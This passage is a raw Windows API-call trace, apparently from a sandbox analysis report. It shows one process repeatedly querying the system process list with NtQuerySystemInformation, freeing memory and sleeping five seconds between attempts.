BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.788] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.800] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.813] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.840] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.844] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.860] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.875] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.893] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.907] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.927] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.938] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.955] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.969] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.988] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.017] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.031] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.047] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.064] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.078] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.120] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 